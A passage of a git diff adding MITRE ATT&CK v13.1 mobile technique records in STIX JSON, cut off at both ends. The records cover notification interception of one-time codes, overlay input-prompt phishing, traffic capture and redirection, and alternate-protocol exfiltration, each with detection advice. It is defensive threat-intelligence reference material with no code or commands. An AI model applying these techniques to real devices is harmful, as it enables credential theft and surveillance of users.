"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Eavesdrop on Insecure Network Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2.json new file mode 100644 index 0000000000000000000000000000000000000000..33928a68ebfa2e7dc846ad4c4a4a5ba565256812 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--2e8fc769-2a3a-4f1c-9315-a3531d4d215b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-15T16:26:05.050Z", + "name": "Access Notifications", + "description": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. Users can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "created": "2019-09-15T15:26:08.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1517", + "external_id": "T1517" + }, + { + "source_name": "ESET 2FA Bypass", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2019, June 17). Malware sidesteps Google permissions policy with new 2FA bypass technique. Retrieved September 15, 2019.", + "url": "https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9.json new file mode 100644 index 0000000000000000000000000000000000000000..5f61efe557206256407300d78cdf10388c9698a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--711dac91-c675-4d46-82b9-58352938850a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9", + "created": "2017-10-25T14:48:14.982Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1410", + "url": "https://attack.mitre.org/techniques/T1410" + }, + { + "source_name": "Skycure-Profiles", + "url": "https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/", + "description": "Yair Amit. (2013, March 12). Malicious Profiles - The Sleeping Giant of iOS Security. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.\n\nA malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.\n\nAlternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.\n\nAn adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.\n\nIf applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.", + "modified": "2022-04-15T17:52:24.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Traffic Capture or Redirection", + "x_mitre_detection": "On both Android and iOS the user must grant consent to an app to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is in place.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2.json new file mode 100644 index 0000000000000000000000000000000000000000..4c02b58a83a70c2a45ff7cc98c1b0ec6691bdb1f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2.json @@ -0,0 +1,114 @@ +{ + "type": "bundle", + "id": "bundle--4af85987-f026-4f22-93fb-c69fbf612d1f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "created": "2017-10-25T14:48:34.407Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1411", + "url": "https://attack.mitre.org/techniques/T1411" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016." + }, + { + "source_name": "Android Background", + "url": "https://developer.android.com/guide/components/activities/background-starts", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019." + }, + { + "source_name": "Android-getRunningTasks", + "url": "https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29", + "description": "Android. (n.d.). ActivityManager getRunningTasks documentation. Retrieved January 19, 2017." + }, + { + "source_name": "Cloak and Dagger", + "url": "http://cloak-and-dagger.org/", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019." + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "url": "https://www.group-ib.com/blog/gustuff", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named \u00abGustuff\u00bb capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019." + }, + { + "source_name": "eset-finance", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018." + }, + { + "source_name": "Hassell-ExploitingAndroid", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019." + }, + { + "source_name": "XDA Bubbles", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019." + }, + { + "source_name": "NowSecure Android Overlay", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/", + "description": "Ramirez, T.. (2017, May 25). \u2018SAW\u2019-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019." + }, + { + "source_name": "ThreatFabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019." + }, + { + "source_name": "StackOverflow-getRunningAppProcesses", + "url": "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag", + "description": "Various. (n.d.). Android 5.1.1 and above - getRunningAppProcesses() returns my application package only. Retrieved January 19, 2017." + }, + { + "source_name": "Skycure-Accessibility", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-31" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.\n\nCompared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique\u2019s use.(Citation: Felt-PhishingOnMobileDevices)\n\nSpecific approaches to this technique include:\n\n### Impersonate the identity of a legitimate application\n\nA malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)\n\n### Display a prompt on top of a running legitimate application\n\nA malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the `ActivityManager` API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android\u2019s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:\n\n* A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)\n\n### Fake device notifications\n\nA malicious application could send fake device notifications to the user. Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)", + "modified": "2022-04-05T19:52:32.190Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Input Prompt", + "x_mitre_detection": "The user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission to create overlay windows on top of other apps through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d.json new file mode 100644 index 0000000000000000000000000000000000000000..8f91c8f8a2d5b384762e57db46068a3739ad4ff4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c15e415b-3faa-4629-ab16-cf7b7eb0a0d3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "created": "2022-04-06T13:19:33.785Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639", + "url": "https://attack.mitre.org/techniques/T1639" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels. ", + "modified": "2022-04-29T17:29:00.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Alternative Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09.json new file mode 100644 index 0000000000000000000000000000000000000000..e1c78a15243150719f71dc7bf26dffdcaf0440f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--c344b53e-edd5-41ae-9969-5ae74cdf6e9d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "type": "attack-pattern", + "created": "2017-10-25T14:48:24.069Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1460", + "external_id": "T1460" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Biometric Spoofing", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5.json new file mode 100644 index 0000000000000000000000000000000000000000..6a3ed0f3619ea062122306469fec6afdb3212bf8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--50ec704b-6666-4888-91bb-fc0b35b48313", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:26:46.043Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "created": "2017-10-25T14:48:31.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1398", + "external_id": "T1398" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--498e7b81-238d-404c-aa5e-332904d63286.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--498e7b81-238d-404c-aa5e-332904d63286.json new file mode 100644 index 0000000000000000000000000000000000000000..6769cee15356674c535fc052de08f6f39ca71ad3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--498e7b81-238d-404c-aa5e-332904d63286.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--2c92a035-b376-4916-9a8e-a6be05d0ad78", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:44:26.317Z", + "name": "Execution Guardrails", + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Users can review which applications have location and sensitive phone information permissions in the operating system\u2019s settings menu. Application vetting services can detect unnecessary and potentially permissions or API calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "created": "2022-03-30T20:31:16.624Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1627", + "external_id": "T1627" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512.json new file mode 100644 index 0000000000000000000000000000000000000000..b2834bfcbaadbc58afeed599cd8e337fde62f5b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512.json @@ -0,0 +1,108 @@ +{ + "type": "bundle", + "id": "bundle--3f75ef21-2ca3-4e52-bc2a-c39b26f6d60e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:51.676Z", + "name": "GUI Input Capture", + "description": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique\u2019s use.(Citation: Felt-PhishingOnMobileDevices)\n\nThere are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) \n\nAdditionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android\u2019s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:\n\n* Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Android users can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \n\nApplication vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "created": "2022-04-05T19:48:31.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417/002", + "external_id": "T1417.002" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf" + }, + { + "source_name": "Android Background", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.", + "url": "https://developer.android.com/guide/components/activities/background-starts" + }, + { + "source_name": "Cloak and Dagger", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019.", + "url": "http://cloak-and-dagger.org/" + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named \u00abGustuff\u00bb capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.", + "url": "https://www.group-ib.com/blog/gustuff" + }, + { + "source_name": "eset-finance", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018.", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/" + }, + { + "source_name": "Hassell-ExploitingAndroid", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019.", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf" + }, + { + "source_name": "XDA Bubbles", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/" + }, + { + "source_name": "NowSecure Android Overlay", + "description": "Ramirez, T.. (2017, May 25). \u2018SAW\u2019-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/" + }, + { + "source_name": "ThreatFabric Cerberus", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + }, + { + "source_name": "Skycure-Accessibility", + "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "external_id": "APP-31" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce.json new file mode 100644 index 0000000000000000000000000000000000000000..72e3e189e8462b686a4ef8c0a0ac73543a991bf2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": 